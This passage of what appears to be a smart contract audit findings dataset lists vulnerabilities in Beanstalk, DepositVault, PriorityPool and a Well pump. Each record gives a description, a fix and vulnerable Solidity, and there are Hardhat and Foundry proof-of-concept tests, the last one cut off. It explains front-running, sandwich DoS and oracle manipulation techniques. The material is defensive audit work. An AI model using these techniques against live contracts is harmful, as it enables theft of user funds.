Beanstalk functions that they should not refund Eth\\n// at the end of 
the function because the function is wrapped in a Farm function\\nmodifier withEth() {\\n if (msg.value > 0) s.isFarm = 2;\\n _;\\n if (msg.value > 0) {\\n s.isFarm = 1;\\n LibEth.refundEth();\\n }\\n}\\n```\\n -Duplicate fees will be paid by `LibTransfer::transferFee` when transferring fee-on-transfer tokens with `EXTERNAL_INTERNAL` 'from' mode and `EXTERNAL` 'to' modeчmediumчBeanstalk utilizes an internal virtual balance system that significantly reduces transaction fees when using tokens that are intended to remain within the protocol. `LibTransfer` achieves this by managing every transfer between accounts, considering both the origin 'from' and destination 'to' modes of the in-flight funds. As a result, there are four types of transfers based on the source of the funds (from mode):\\nEXTERNAL: The sender will not use their internal balances for the operation.\\nINTERNAL: The sender will use their internal balances for the operation.\\nEXTERNAL_INTERNAL: The sender will attempt to utilize their internal balance to transfer all desired funds. If funds remain to be sent, their externally owned funds will be utilized to cover the difference.\\nINTERNAL_TOLERANT: The sender will utilize their internal balances for the operation. With insufficient internal balance, the operation will continue (without reverting) with this reduced amount. 
It is, therefore, imperative to always check the return value of LibTransfer functions to continue the execution of calling functions with the true utilized amount, especially in this internal tolerant case.\\nThe current implementation of `LibTransfer::transferToken` for `(from mode: EXTERNAL ; to mode: EXTERNAL)` ensures a safe transfer operation from the sender to the recipient:\\n```\\n// LibTransfer::transferToken\\nif (fromMode == From.EXTERNAL && toMode == To.EXTERNAL) {\\n uint256 beforeBalance = token.balanceOf(recipient);\\n token.safeTransferFrom(sender, recipient, amount);\\n return token.balanceOf(recipient).sub(beforeBalance);\\n}\\namount = receiveToken(token, amount, sender, fromMode);\\nsendToken(token, amount, recipient, toMode);\\nreturn amount;\\n```\\n\\nPerforming this operation allows duplication of fee-on-transfer token fees to be avoided if funds are first transferred to the contract and then to the recipient; however, `LibTransfer::transferToken` balance will incur double the fee if this function is used for `(from mode: EXTERNAL_INTERNAL ; to mode: EXTERNAL)` when the internal balance is insufficient to cover the full transfer amount, given that:\\nThe remaining token balance would first be transferred to the Beanstalk Diamond, incurring fees.\\nThe remaining token balance would then be transferred to the recipient, incurring fees again.чAdd an internal function `LibTransfer::handleFromExternalInternalToExternalTransfer` to handle this case to avoid duplication of fees. 
For instance:\\n```\\nfunction handleFromExternalInternalToExternalTransfer(\\n IERC20 token,\\n address sender,\\n address recipient,\\n uint256 amount\\n) internal {\\n uint256 amountFromInternal = LibBalance.decreaseInternalBalance(\\n sender,\\n token,\\n amount,\\n true // allowPartial to avoid revert\\n );\\n uint256 pendingAmount = amount - amountFromInternal;\\n if (pendingAmount != 0) {\\n token.safeTransferFrom(sender, recipient, pendingAmount);\\n }\\n token.safeTransfer(recipient, amountFromInternal);\\n}\\n```\\n\\nThen consider the use of this new function in LibTransfer::transferToken:\\n```\\n function transferToken(\\n IERC20 token,\\n address sender,\\n address recipient,\\n uint256 amount,\\n From fromMode,\\n To toMode\\n ) internal returns (uint256 transferredAmount) {\\n// Remove the line below\\n if (fromMode == From.EXTERNAL && toMode == To.EXTERNAL) {\\n// Add the line below\\n if (toMode == To.EXTERNAL) {\\n// Add the line below\\n if (fromMode == From.EXTERNAL) {\\n uint256 beforeBalance = token.balanceOf(recipient);\\n token.safeTransferFrom(sender, recipient, amount);\\n return token.balanceOf(recipient).sub(beforeBalance);\\n// Add the line below\\n } else if (fromMode == From.EXTERNAL_INTERNAL) {\\n// Add the line below\\n handleFromExternalInternalToExternalTransfer(token, sender, recipient, amount);\\n// Add the line below\\n return amount;\\n// Add the line below\\n }\\n }\\n amount = receiveToken(token, amount, sender, fromMode);\\n sendToken(token, amount, recipient, toMode);\\n return amount;\\n }\\n```\\nч`LibTransfer::transferToken` will incur duplicate fees if this function is used for `(from mode: EXTERNAL_INTERNAL ; to mode: EXTERNAL)` with fee-on-transfer tokens if the internal balance is not sufficient to cover the full transfer amount.\\nEven though Beanstalk currently does not impose any fees on token transfers, USDT is associated with the protocol, and its contract has already introduced logic to implement a fee on token 
transfer mechanism if ever desired in the future. Considering that the duplication of fees implies a loss of funds, but also taking into account the low likelihood of this issue occurring, the severity assigned to this issue is MEDIUM.ч```\\n// LibTransfer::transferToken\\nif (fromMode == From.EXTERNAL && toMode == To.EXTERNAL) {\\n uint256 beforeBalance = token.balanceOf(recipient);\\n token.safeTransferFrom(sender, recipient, amount);\\n return token.balanceOf(recipient).sub(beforeBalance);\\n}\\namount = receiveToken(token, amount, sender, fromMode);\\nsendToken(token, amount, recipient, toMode);\\nreturn amount;\\n```\\n -Flood mechanism is susceptible to DoS attacks by a frontrunner, breaking re-peg mechanism when BEAN is above 1 USDчmediumчA call to the BEAN/3CRV Metapool is made withinWeather::sop, swapping Beans for 3CRV, to aid in returning Beanstalk to peg via a mechanism known as \"Flood\" (formerly Season of Plenty, or sop) when the Beanstalk Farm has been \"Oversaturated\" ($P > 1$; $Pod Rate < 5%$) for more than one Season and for each additional Season in which it continues to be Oversaturated. 
This is achieved by minting additional Beans and selling them directly on Curve, distributing the proceeds from the sale as 3CRV to Stalkholders.\\nUnlike `Oracle::stepOracle`, which returns the aggregate time-weighted `deltaB` value across both the BEAN/3CRV Metapool and BEAN/ETH Well, the current shortage/excess of Beans during the handling of Rain in `Weather::stepWeather` are calculated directly from the Curve Metapool via `LibBeanMetaCurve::getDeltaB`.\\n```\\n function getDeltaB() internal view returns (int256 deltaB) {\\n uint256[2] memory balances = C.curveMetapool().get_balances();\\n uint256 d = getDFroms(balances);\\n deltaB = getDeltaBWithD(balances[0], d);\\n }\\n```\\n\\nThis introduces the possibility that a long-tail MEV bot could perform a denial-of-service attack on the Flood mechanism by performing a sandwich attack on `SeasonFacet::gm` whenever the conditions are met such that `Weather::sop` is called. The attacker would first front-run the transaction by selling BEAN for 3CRV, bringing the price of BEAN back to peg, which could result in `newBeans <= 0`, thus bypassing the subsequent logic, and then back-running to repurchase their sold BEAN effectively maintaining the price of BEAN above peg.\\nThe cost for performing this attack is 0.08% of the utilized funds. However, not accounting for other mechanisms (such as Convert) designed to return the price of Bean to peg, Beanstalk would need to wait the Season duration of 1 hour before making another effective `SeasonFacet::gm`, provided that the previous transaction did not revert. In the subsequent call, the attacker can replicate this action at the same cost, and it is possible that the price of BEAN may have increased further during this hour.чConsider the use of an oracle to determine how many new Beans should be minted and sold for 3CRV. 
This implies the following modification:\\n```\\n function sop() private {\\n// Remove the line below\\n int256 newBeans = LibBeanMetaCurve.getDeltaB();\\n// Add the line below\\n int256 currentDeltaB = LibBeanMetaCurve.getDeltaB();\\n// Add the line below\\n (int256 deltaBFromOracle,) = // Remove the line below\\n LibCurveMinting.twaDeltaB();\\n// Add the line below\\n // newBeans = max(currentDeltaB, deltaBFromOracle)\\n// Add the line below\\n newBeans = currentDeltaB > deltaBFromOracle ? currentDeltaB : deltaBFromOracle;\\n\\n if (newBeans <= 0) return;\\n\\n uint256 sopBeans = uint256(newBeans);\\n uint256 newHarvestable;\\n\\n // Pay off remaining Pods if any exist.\\n if (s.f.harvestable < s.r.pods) {\\n newHarvestable = s.r.pods // Remove the line below\\n s.f.harvestable;\\n s.f.harvestable = s.f.harvestable.add(newHarvestable);\\n C.bean().mint(address(this), newHarvestable.add(sopBeans));\\n } else {\\n C.bean().mint(address(this), sopBeans);\\n }\\n\\n // Swap Beans for 3CRV.\\n uint256 amountOut = C.curveMetapool().exchange(0, 1, sopBeans, 0);\\n\\n rewardSop(amountOut);\\n emit SeasonOfPlenty(s.season.current, amountOut, newHarvestable);\\n }\\n```\\n\\nThe motivation for using the maximum value between the current `deltaB` and that calculated from time-weighted average balances is that the action of an attacker increasing `deltaB` to carry out a sandwich attack would be nonsensical as excess Bean minted by the Flood mechanism would be sold for additional 3CRV. In this way, anyone attempting to increase `deltaB` would essentially be giving away their 3CRV LP tokens to Stalkholders. Therefore, by using the maximum `deltaB`, it is ensured that the impact of any attempt to execute the attack described above would be minimal and economically unattractive. 
If no one attempts the attack, the behavior will remain as originally intended.\\n\\clearpageчAttempts by Beanstalk to restore peg via the Flood mechanism are susceptible to denial-of-service attacks by a sufficiently well-funded sandwich attacker through frontrunning of `SeasonFacet::gm`.ч```\\n function getDeltaB() internal view returns (int256 deltaB) {\\n uint256[2] memory balances = C.curveMetapool().get_balances();\\n uint256 d = getDFroms(balances);\\n deltaB = getDeltaBWithD(balances[0], d);\\n }\\n```\\n -Spender can front-run calls to modify token allowances, resulting in DoS and/or spending more than was intendedчlowчWhen updating the allowance for a spender that is less than the value currently set, a well-known race condition allows the spender to spend more than the caller intended by front-running the transaction that performs this update. Due to the nature of the `ERC20::approve` implementation and other variants used within the Beanstalk system, which update the mapping in storage corresponding to the given allowance, the spender can spend both the existing allowance plus any 'additional' allowance set by the in-flight transaction.\\nFor example, consider the scenario:\\nAlice approves Bob 100 tokens.\\nAlice later decides to decrease this to 50.\\nBob sees this transaction in the mempool and front-runs, spending his 100 token allowance.\\nAlice's transaction executes, and Bob's allowance is updated to 50.\\nBob can now spend an additional 50 tokens, resulting in a total of 150 rather than the maximum of 50 as intended by Alice.\\nSpecific functions named `decreaseTokenAllowance`, intended to decrease approvals for a token spender, have been introduced to both the `TokenFacet` and the `ApprovalFacet`. 
`PodTransfer::decrementAllowancePods` similarly exists for the Pod Marketplace.\\nThe issue, however, with these functions is that they are still susceptible to front-running in the sense that a malicious spender could force their execution to revert, violating the intention of the caller to decrease their allowance as they continue to spend that which is currently set. Rather than simply setting the allowance to zero if the caller passes an amount to subtract that is larger than the current allowance, these functions halt execution and revert. This is due to the following line of shared logic:\\n```\\nrequire(\\n currentAllowance >= subtractedValue,\\n \"Silo: decreased allowance below zero\"\\n);\\n```\\n\\nConsider the following scenario:\\nAlice approves Bob 100 tokens.\\nAlice later decides to decrease this to 50.\\nBob sees this transaction in the mempool and front-runs, spending 60 of his 100 token allowance.\\nAlice's transaction executes, but reverts given Bob's allowance is now 40.\\nBob can now spend the remaining 40 tokens, resulting in a total of 100 rather than the decreased amount of 50 as intended by Alice.\\nOf course, in this scenario, Bob could have just as easily front-run Alice's transaction and spent his entire existing allowance; however, the fact that he is able to perform a denial-of-service attack results in a degraded user experience. 
Similar to setting maximum approvals, these functions should handle maximum approval revocations to mitigate against this issue.чSet the allowance to zero if the intended subtracted value exceeds the current allowance.\\n\\clearpageчRequiring that the intended subtracted allowance does not exceed the current allowance results in a degraded user experience and, more significantly, their loss of funds due to a different route to the same approval front-running attack vector.ч```\\nrequire(\\n currentAllowance >= subtractedValue,\\n \"Silo: decreased allowance below zero\"\\n);\\n```\\n -Non-standard ERC20 tokens are not supportedчmediumчThe protocol implemented a function `deposit()` to allow users to deposit.\\n```\\nDepositVault.sol\\n function deposit(uint256 amount, address tokenAddress) public payable {\\n require(amount > 0 || msg.value > 0, \"Deposit amount must be greater than 0\");\\n if(msg.value > 0) {\\n require(tokenAddress == address(0), \"Token address must be 0x0 for ETH deposits\");\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), msg.value, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, msg.value, tokenAddress);\\n } else {\\n require(tokenAddress != address(0), \"Token address must not be 0x0 for token deposits\");\\n IERC20 token = IERC20(tokenAddress);\\n token.safeTransferFrom(msg.sender, address(this), amount);\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), amount, tokenAddress));//@audit-issue fee-on-transfer, rebalancing tokens will cause problems\\n emit DepositMade(msg.sender, depositIndex, amount, tokenAddress);\\n }\\n }\\n```\\n\\nLooking at the line L49, we can see that the protocol assumes `amount` of tokens were transferred. But this does not hold true for some non-standard ERC20 tokens like fee-on-transfer tokens or rebalancing tokens. 
(Refer to here about the non-standard weird ERC20 tokens)\\nFor example, if token incurs fee on transfer, the actually transferred `amount` will be less than the provided parameter `amount` and the `deposits` will have a wrong state value. Because the current implementation only allows full withdrawal, this means the tokens will be locked in the contract permanently.чWe recommend adding another field in the `Deposit` structure, say `balance`\\nWe recommend allow users to withdraw partially and decrease the `balance` field appropriately for successful withdrawals. If these changes are going to be made, we note that there are other parts that need changes. For example, the withdraw function would need to be updated so that it does not require the withdrawal amount is same to the original deposit amount.чIf non-standard ERC20 tokens are used, the tokens could be locked in the contract permanently.ч```\\nDepositVault.sol\\n function deposit(uint256 amount, address tokenAddress) public payable {\\n require(amount > 0 || msg.value > 0, \"Deposit amount must be greater than 0\");\\n if(msg.value > 0) {\\n require(tokenAddress == address(0), \"Token address must be 0x0 for ETH deposits\");\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), msg.value, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, msg.value, tokenAddress);\\n } else {\\n require(tokenAddress != address(0), \"Token address must not be 0x0 for token deposits\");\\n IERC20 token = IERC20(tokenAddress);\\n token.safeTransferFrom(msg.sender, address(this), amount);\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), amount, tokenAddress));//@audit-issue fee-on-transfer, rebalancing tokens will cause problems\\n emit DepositMade(msg.sender, depositIndex, amount, tokenAddress);\\n }\\n }\\n```\\n -The deposit function is not following CEI patternчlowчThe protocol implemented a function `deposit()` to allow users to 
deposit.\\n```\\nDepositVault.sol\\n function deposit(uint256 amount, address tokenAddress) public payable {\\n require(amount > 0 || msg.value > 0, \"Deposit amount must be greater than 0\");\\n if(msg.value > 0) {\\n require(tokenAddress == address(0), \"Token address must be 0x0 for ETH deposits\");\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), msg.value, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, msg.value, tokenAddress);\\n } else {\\n require(tokenAddress != address(0), \"Token address must not be 0x0 for token deposits\");\\n IERC20 token = IERC20(tokenAddress);\\n token.safeTransferFrom(msg.sender, address(this), amount);//@audit-issue against CEI pattern\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), amount, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, amount, tokenAddress);\\n }\\n }\\n```\\n\\nLooking at the line L47, we can see that the token transfer happens before updating the accounting state of the protocol against the CEI pattern. Because the protocol intends to support all ERC20 tokens, the tokens with hooks (e.g. ERC777) can be exploited for reentrancy. 
Although we can not verify an exploit that causes explicit loss due to this, it is still highly recommended to follow CEI pattern to prevent possible reentrancy attack.чHandle token transfers after updating the `deposits` state.чч```\\nDepositVault.sol\\n function deposit(uint256 amount, address tokenAddress) public payable {\\n require(amount > 0 || msg.value > 0, \"Deposit amount must be greater than 0\");\\n if(msg.value > 0) {\\n require(tokenAddress == address(0), \"Token address must be 0x0 for ETH deposits\");\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), msg.value, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, msg.value, tokenAddress);\\n } else {\\n require(tokenAddress != address(0), \"Token address must not be 0x0 for token deposits\");\\n IERC20 token = IERC20(tokenAddress);\\n token.safeTransferFrom(msg.sender, address(this), amount);//@audit-issue against CEI pattern\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), amount, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, amount, tokenAddress);\\n }\\n }\\n```\\n -Nonstandard usage of nonceчlowчThe protocol implemented two withdraw functions `withdrawDeposit()` and `withdraw()`. While the function `withdrawDeposit()` is designed to be used by the depositor themselves, the function `withdraw()` is designed to be used by anyone who has a signature from the depositor. 
The function `withdraw()` has a parameter `nonce` but the usage of this param is not aligned with the general meaning of `nonce`.\\n```\\nDepositVault.sol\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public {\\n require(nonce < deposits.length, \"Invalid deposit index\");\\n Deposit storage depositToWithdraw = deposits[nonce];//@audit-info non aligned with common understanding of nonce\\n bytes32 withdrawalHash = getWithdrawalHash(Withdrawal(amount, nonce));\\n address signer = withdrawalHash.recover(signature);\\n require(signer == depositToWithdraw.depositor, \"Invalid signature\");\\n require(!usedWithdrawalHashes[withdrawalHash], \"Withdrawal has already been executed\");\\n require(amount == depositToWithdraw.amount, \"Withdrawal amount must match deposit amount\");\\n usedWithdrawalHashes[withdrawalHash] = true;\\n depositToWithdraw.amount = 0;\\n if(depositToWithdraw.tokenAddress == address(0)){\\n recipient.transfer(amount);\\n } else {\\n IERC20 token = IERC20(depositToWithdraw.tokenAddress);\\n token.safeTransfer(recipient, amount);\\n }\\n emit WithdrawalMade(recipient, amount);\\n }\\n```\\n\\nIn common usage, `nonce` is used to track the latest transaction from the EOA and generally it is increased on the user's transaction. It can be effectively used to invalidate the previous signature by the signer. But looking at the current implementation, the parameter `nonce` is merely used as an index to refer the `deposit` at a specific index.\\nThis is a bad naming and can confuse the users.чIf the protocol intended to provide a kind of invalidation mechanism using the nonce, there should be a separate mapping that stores the nonce for each user. The current nonce can be used to generate a signature and a depositor should be able to increase the nonce to invalidate the previous signatures. Also the nonce would need to be increased on every successful call to `withdraw()` to prevent replay attack. 
Please note that with this remediation, the mapping `usedWithdrawalHashes` can be removed completely because the hash will be always decided using the latest nonce and the nonce will be invalidated automatically (because it increases on successful call).\\nIf this is not what the protocol intended, the parameter nonce can be renamed to `depositIndex` as implemented in the function `withdrawDeposit()`.чч```\\nDepositVault.sol\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public {\\n require(nonce < deposits.length, \"Invalid deposit index\");\\n Deposit storage depositToWithdraw = deposits[nonce];//@audit-info non aligned with common understanding of nonce\\n bytes32 withdrawalHash = getWithdrawalHash(Withdrawal(amount, nonce));\\n address signer = withdrawalHash.recover(signature);\\n require(signer == depositToWithdraw.depositor, \"Invalid signature\");\\n require(!usedWithdrawalHashes[withdrawalHash], \"Withdrawal has already been executed\");\\n require(amount == depositToWithdraw.amount, \"Withdrawal amount must match deposit amount\");\\n usedWithdrawalHashes[withdrawalHash] = true;\\n depositToWithdraw.amount = 0;\\n if(depositToWithdraw.tokenAddress == address(0)){\\n recipient.transfer(amount);\\n } else {\\n IERC20 token = IERC20(depositToWithdraw.tokenAddress);\\n token.safeTransfer(recipient, amount);\\n }\\n emit WithdrawalMade(recipient, amount);\\n }\\n```\\n -Unnecessary parameter amount in withdraw functionчlowчThe function `withdraw()` has a parameter `amount` but we don't understand the necessity of this parameter. At line L67, the `amount` is required to be the same to the whole deposit `amount`. 
This means the user does not have a flexibility to choose the withdraw `amount`, after all it means the parameter was not necessary at all.\\n```\\nDepositVault.sol\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public {\\n require(nonce < deposits.length, \"Invalid deposit index\");\\n Deposit storage depositToWithdraw = deposits[nonce];\\n bytes32 withdrawalHash = getWithdrawalHash(Withdrawal(amount, nonce));\\n address signer = withdrawalHash.recover(signature);\\n require(signer == depositToWithdraw.depositor, \"Invalid signature\");\\n require(!usedWithdrawalHashes[withdrawalHash], \"Withdrawal has already been executed\");\\n require(amount == depositToWithdraw.amount, \"Withdrawal amount must match deposit amount\");//@audit-info only full withdrawal is allowed\\n usedWithdrawalHashes[withdrawalHash] = true;\\n depositToWithdraw.amount = 0;\\n if(depositToWithdraw.tokenAddress == address(0)){\\n recipient.transfer(amount);\\n } else {\\n IERC20 token = IERC20(depositToWithdraw.tokenAddress);\\n token.safeTransfer(recipient, amount);\\n }\\n emit WithdrawalMade(recipient, amount);\\n }\\n```\\nчIf the protocol intends to only allow full withdrawal, this parameter can be removed completely (that will help save gas as well). 
Unnecessary parameters increase the complexity of the function and more error prone.чч```\\nDepositVault.sol\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public {\\n require(nonce < deposits.length, \"Invalid deposit index\");\\n Deposit storage depositToWithdraw = deposits[nonce];\\n bytes32 withdrawalHash = getWithdrawalHash(Withdrawal(amount, nonce));\\n address signer = withdrawalHash.recover(signature);\\n require(signer == depositToWithdraw.depositor, \"Invalid signature\");\\n require(!usedWithdrawalHashes[withdrawalHash], \"Withdrawal has already been executed\");\\n require(amount == depositToWithdraw.amount, \"Withdrawal amount must match deposit amount\");//@audit-info only full withdrawal is allowed\\n usedWithdrawalHashes[withdrawalHash] = true;\\n depositToWithdraw.amount = 0;\\n if(depositToWithdraw.tokenAddress == address(0)){\\n recipient.transfer(amount);\\n } else {\\n IERC20 token = IERC20(depositToWithdraw.tokenAddress);\\n token.safeTransfer(recipient, amount);\\n }\\n emit WithdrawalMade(recipient, amount);\\n }\\n```\\n -Functions not used internally could be marked externalчlowчUsing proper visibility modifiers is a good practice to prevent unintended access to functions. 
Furthermore, marking functions as `external` instead of `public` can save gas.\\n```\\nFile: DepositVault.sol\\n\\n function deposit(uint256 amount, address tokenAddress) public payable\\n\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public\\n\\n function withdrawDeposit(uint256 depositIndex) public\\n```\\nчConsider change the visibility modifier to `external` for the functions that are not used internally.чч```\\nFile: DepositVault.sol\\n\\n function deposit(uint256 amount, address tokenAddress) public payable\\n\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public\\n\\n function withdrawDeposit(uint256 depositIndex) public\\n```\\n -User's funds are locked temporarily in the PriorityPool contractчmediumчThe protocol intended to utilize the deposit queue for withdrawal to minimize the stake/unstake interaction with the staking pool. When a user wants to withdraw, they are supposed to call the function `PriorityPool::withdraw()` with the desired amount as a parameter.\\n```\\nfunction withdraw(uint256 _amount) external {//@audit-info LSD token\\n if (_amount == 0) revert InvalidAmount();\\n IERC20Upgradeable(address(stakingPool)).safeTransferFrom(msg.sender, address(this), _amount);//@audit-info get LSD token from the user\\n _withdraw(msg.sender, _amount);\\n}\\n```\\n\\nAs we can see in the implementation, the protocol pulls the `_amount` of LSD tokens from the user first and then calls `_withdraw()` where the actual withdrawal utilizing the queue is processed.\\n```\\nfunction _withdraw(address _account, uint256 _amount) internal {\\n if (poolStatus == PoolStatus.CLOSED) revert WithdrawalsDisabled();\\n\\n uint256 toWithdrawFromQueue = _amount <= totalQueued ? 
_amount : totalQueued;//@audit-info if the queue is not empty, we use that first\\n uint256 toWithdrawFromPool = _amount - toWithdrawFromQueue;\\n\\n if (toWithdrawFromQueue != 0) {\\n totalQueued -= toWithdrawFromQueue;\\n depositsSinceLastUpdate += toWithdrawFromQueue;//@audit-info regard this as a deposit via the queue\\n }\\n\\n if (toWithdrawFromPool != 0) {\\n stakingPool.withdraw(address(this), address(this), toWithdrawFromPool);//@audit-info withdraw from pool into this contract\\n }\\n\\n //@audit-warning at this point, toWithdrawFromQueue of LSD tokens remain in this contract!\\n\\n token.safeTransfer(_account, _amount);//@audit-info\\n emit Withdraw(_account, toWithdrawFromPool, toWithdrawFromQueue);\\n}\\n```\\n\\nBut looking in the function `_withdraw()`, only `toWithdrawFromPool` amount of LSD tokens are withdrawn (burn) from the staking pool and `toWithdrawFromQueue` amount of LSD tokens remain in the `PriorityPool` contract. On the other hand, the contract tracks the queued amount for users by the mapping `accountQueuedTokens` and this leads to possible mismatch in the accounting. Due to this mismatch, a user's LSD tokens can be locked in the `PriorityPool` contract while the user sees his queued amount (getQueuedTokens()) is positive. Users can claim the locked LSD tokens once the function `updateDistribution` is called. Through the communication with the protocol team, it is understood that `updateDistribution` is expected to be called probably every 1-2 days unless there were any new deposits into the staking pool. 
So it means user's funds can be locked temporarily in the contract which is unfair for the user.чConsider add a feature to allow users to withdraw LSD tokens from the contract directly.чUser's LSD tokens can be locked temporarily in the PriorityPool contract\\nProof of Concept:\\n```\\n it('Cyfrin: user funds can be locked temporarily', async () => {\\n // try deposit 1500 while the capacity is 1000\\n await strategy.setMaxDeposits(toEther(1000))\\n await sq.connect(signers[1]).deposit(toEther(1500), true)\\n\\n // 500 ether is queued for accounts[1]\\n assert.equal(fromEther(await stakingPool.balanceOf(accounts[1])), 1000)\\n assert.equal(fromEther(await sq.getQueuedTokens(accounts[1], 0)), 500)\\n assert.equal(fromEther(await token.balanceOf(accounts[1])), 8500)\\n assert.equal(fromEther(await sq.totalQueued()), 500)\\n assert.equal(fromEther(await stakingPool.balanceOf(sq.address)), 0)\\n\\n // at this point user calls withdraw (maybe by mistake?)\\n // withdraw swipes from the queue and the deposit room stays at zero\\n await stakingPool.connect(signers[1]).approve(sq.address, toEther(500))\\n await sq.connect(signers[1]).withdraw(toEther(500))\\n\\n // at this point getQueueTokens[accounts[1]] does not change but the queue is empty\\n // user will think his queue position did not change and he can simply unqueue\\n assert.equal(fromEther(await stakingPool.balanceOf(accounts[1])), 500)\\n assert.equal(fromEther(await sq.getQueuedTokens(accounts[1], 0)), 500)\\n assert.equal(fromEther(await token.balanceOf(accounts[1])), 9000)\\n assert.equal(fromEther(await sq.totalQueued()), 0)\\n // NOTE: at this point 500 ethers of LSD tokens are locked in the queue contract\\n assert.equal(fromEther(await stakingPool.balanceOf(sq.address)), 500)\\n\\n // but unqueueTokens fails because actual totalQueued is zero\\n await expect(sq.connect(signers[1]).unqueueTokens(0, 0, [], toEther(500))).to.be.revertedWith(\\n 'InsufficientQueuedTokens()'\\n )\\n\\n // user's LSD tokens 
are still locked in the queue contract\\n await stakingPool.connect(signers[1]).approve(sq.address, toEther(500))\\n await sq.connect(signers[1]).withdraw(toEther(500))\\n assert.equal(fromEther(await stakingPool.balanceOf(accounts[1])), 0)\\n assert.equal(fromEther(await sq.getQueuedTokens(accounts[1], 0)), 500)\\n assert.equal(fromEther(await token.balanceOf(accounts[1])), 9500)\\n assert.equal(fromEther(await sq.totalQueued()), 0)\\n assert.equal(fromEther(await stakingPool.balanceOf(sq.address)), 500)\\n\\n // user might try withdraw again but it will revert because user does not have any LSD tokens\\n await stakingPool.connect(signers[1]).approve(sq.address, toEther(500))\\n await expect(sq.connect(signers[1]).withdraw(toEther(500))).to.be.revertedWith(\\n 'Transfer amount exceeds balance'\\n )\\n\\n // in conclusion, user's LSD tokens are locked in the queue contract and he cannot withdraw them\\n // it is worth noting that the locked LSD tokens are credited once updateDistribution is called\\n // so the lock is temporary\\n })\\n```\\nч```\\nfunction withdraw(uint256 _amount) external {//@audit-info LSD token\\n if (_amount == 0) revert InvalidAmount();\\n IERC20Upgradeable(address(stakingPool)).safeTransferFrom(msg.sender, address(this), _amount);//@audit-info get LSD token from the user\\n _withdraw(msg.sender, _amount);\\n}\\n```\\n -Each Well is responsible for ensuring that an `update` call cannot be made with a reserve of 0чhighчThe current implementation of `GeoEmaAndCumSmaPump` assumes each well will call `update()` with non-zero reserves, as commented at the beginning of the file:\\n```\\n/**\\n * @title GeoEmaAndCumSmaPump\\n * @author Publius\\n * @notice Stores a geometric EMA and cumulative geometric SMA for each reserve.\\n * @dev A Pump designed for use in Beanstalk with 2 tokens.\\n *\\n * This Pump has 3 main features:\\n * 1. Multi-block MEV resistence reserves\\n * 2. 
MEV-resistant Geometric EMA intended for instantaneous reserve queries\\n * 3. MEV-resistant Cumulative Geometric intended for SMA reserve queries\\n *\\n * Note: If an `update` call is made with a reserve of 0, the Geometric mean oracles will be set to 0.\\n * Each Well is responsible for ensuring that an `update` call cannot be made with a reserve of 0.\\n */\\n```\\n\\nHowever, there is no actual requirement in `Well` to enforce pump updates with valid reserve values. Given that `GeoEmaAndCumSmaPump` restricts values to a minimum of 1 to prevent issues with the geometric mean, that the TWA values are not truly representative of the reserves in the `Well`, we believe it is worse than reverting in this case, although a `ConstantProduct2` `Well` can have zero reserves for either token via valid transactions.\\n```\\nGeoEmaAndCumSmaPump.sol\\n for (uint i; i < length; ++i) {\\n // Use a minimum of 1 for reserve. Geometric means will be set to 0 if a reserve is 0.\\n b.lastReserves[i] =\\n _capReserve(b.lastReserves[i], (reserves[i] > 0 ? reserves[i] : 1).fromUIntToLog2(), blocksPassed);\\n b.emaReserves[i] = b.lastReserves[i].mul((ABDKMathQuad.ONE.sub(aN))).add(b.emaReserves[i].mul(aN));\\n b.cumulativeReserves[i] = b.cumulativeReserves[i].add(b.lastReserves[i].mul(deltaTimestampBytes));\\n }\\n```\\nчRevert the pump updates if they are called with zero reserve values.чUpdating pumps with zero reserve values can lead to the distortion of critical states likely to be utilized for price oracles. Given that the issue is exploitable through valid transactions, we assess the severity as HIGH. 
It is crucial to note that attackers can exploit this vulnerability to manipulate the price oracle.\\nProof of Concept: The test below shows that it is possible for reserves to be zero through valid transactions and updating pumps do not revert.\\n```\\nfunction testUpdateCalledWithZero() public {\\n address msgSender = 0x83a740c22a319FBEe5F2FaD0E8Cd0053dC711a1A;\\n changePrank(msgSender);\\n IERC20[] memory mockTokens = well.tokens();\\n\\n // add liquidity 1 on each side\\n uint amount = 1;\\n MockToken(address(mockTokens[0])).mint(msgSender, 1);\\n MockToken(address(mockTokens[1])).mint(msgSender, 1);\\n MockToken(address(mockTokens[0])).approve(address(well), amount);\\n MockToken(address(mockTokens[1])).approve(address(well), amount);\\n uint[] memory tokenAmountsIn = new uint[](2);\\n tokenAmountsIn[0] = amount;\\n tokenAmountsIn[1] = amount;\\n uint minLpAmountOut = well.getAddLiquidityOut(tokenAmountsIn);\\n well.addLiquidity(\\n tokenAmountsIn,\\n minLpAmountOut,\\n msgSender,\\n block.timestamp\\n );\\n\\n // swaFromFeeOnTransfer from token1 to token0\\n msgSender = 0xfFfFFffFffffFFffFffFFFFFFfFFFfFfFFfFfFfD;\\n changePrank(msgSender);\\n amount = 79_228_162_514_264_337_593_543_950_334;\\n MockToken(address(mockTokens[1])).mint(msgSender, amount);\\n MockToken(address(mockTokens[1])).approve(address(well), amount);\\n uint minAmountOut = well.getSwapOut(\\n mockTokens[1],\\n mockTokens[0],\\n amount\\n );\\n\\n well.swapFromFeeOnTransfer(\\n mockTokens[1],\\n mockTokens[0],\\n amount,\\n minAmountOut,\\n msgSender,\\n block.timestamp\\n );\\n increaseTime(120);\\n\\n // remove liquidity one token\\n msgSender = 